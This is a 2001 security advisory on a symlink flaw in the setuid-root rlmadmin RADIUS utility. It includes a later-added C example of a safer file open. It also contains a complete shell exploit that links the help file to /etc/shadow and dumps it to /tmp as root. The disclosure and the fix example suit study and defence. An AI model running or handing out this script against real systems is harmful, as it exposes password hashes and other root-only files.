rlmadmin v3.8M view file symlink vulnerability

by Majik on September 7th, 2001

Rlmadmin is a user management utility for RADIUS which comes with the Merit AAA Server package (http://www.merit.edu/michnet/dial-in/aaa/). Using this program and a simple symlink, you can view any file on the system as root.


Description:

Using the -d option of rlmadmin allows you to specify the directory in which it will look for its configuration files.

The files that it looks for in this directory during startup are:

dictionary - dictionary translations for parsing requests and generating responses.
rlmadmin.help - the help file that is displayed on startup.
vendors - vendor specific information.

The problem occurs when rlmadmin reads from the "rlmadmin.help" file. If this file is symlinked to another file (such as /etc/shadow), the program blindly follows the link, causing the contents of the file to be displayed when the program starts up.
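
The root cause described above is a setuid-root program opening a file in a caller-chosen directory with root's privileges. As an added example (not code from the advisory or from the rlmadmin source), here is one way a tool like this could open rlmadmin.help instead: with the invoking user's identity, refusing a symlink at the final path component. The function name open_help_file is hypothetical.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not rlmadmin's code. Returns an fd, or -1 with errno set. */
int open_help_file(const char *dir)
{
    char path[4096];
    struct stat st;
    uid_t saved_euid = geteuid();
    int fd, err;
    if (snprintf(path, sizeof path, "%s/rlmadmin.help", dir) >= (int)sizeof path) {
        errno = ENAMETOOLONG;
        return -1;
    }
    /* Open as the invoking user, so a setuid-root binary reads only what
     * that user could already read. */
    if (seteuid(getuid()) != 0)
        return -1;
    /* O_NOFOLLOW: fail with ELOOP when the final component is a symlink. */
    fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    err = errno;
    if (seteuid(saved_euid) != 0) {      /* could not restore: fail closed */
        if (fd >= 0)
            close(fd);
        return -1;
    }
    if (fd < 0) {
        errno = err;
        return -1;
    }
    /* Check the descriptor, not the path, so the check cannot be raced. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}

int main(int argc, char **argv)
{
    int fd = open_help_file(argc > 1 ? argv[1] : ".");
    if (fd < 0) { perror("rlmadmin.help"); return 1; }
    return close(fd);
}
```

O_NOFOLLOW only covers the last path component, which is why the open is also done with the real uid: a link placed elsewhere in the path then resolves with the caller's own permissions.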








Versions Affected:
------------------
rlmadmin v3.8M (and earlier?)
rlmadmin v5.01 Commercial (available from www.interlinknetworks.com - this version isn't setuid root by default, but is still affected if set by the admin)








Exploit Code:
-------------
#!/bin/sh
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
# rlmadmin view file symlink vulnerability #
# (c)oded 2001 Digital Shadow #
# www.ministryofpeace.co.uk #
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
bloc=/usr/private/etc # executable file location
cloc=/usr/private/etc/raddb # config file location
file=/etc/shadow # file to read
echo == rlmadmin exploit - visit www.ministryofpeace.co.uk for more!
echo = Initialising...
mkdir /tmp/peace; cd /tmp/peace
cp $cloc/dictionary $cloc/vendors .
ln -s $file rlmadmin.help
echo = Exploiting...
echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
mv peace.log /tmp; rm dictionary rlmadmin.help vendors
echo = Done!
echo == Now look in /tmp/peace.log!








Credits:
--------
Vulnerability discovered by Digital Shadow.

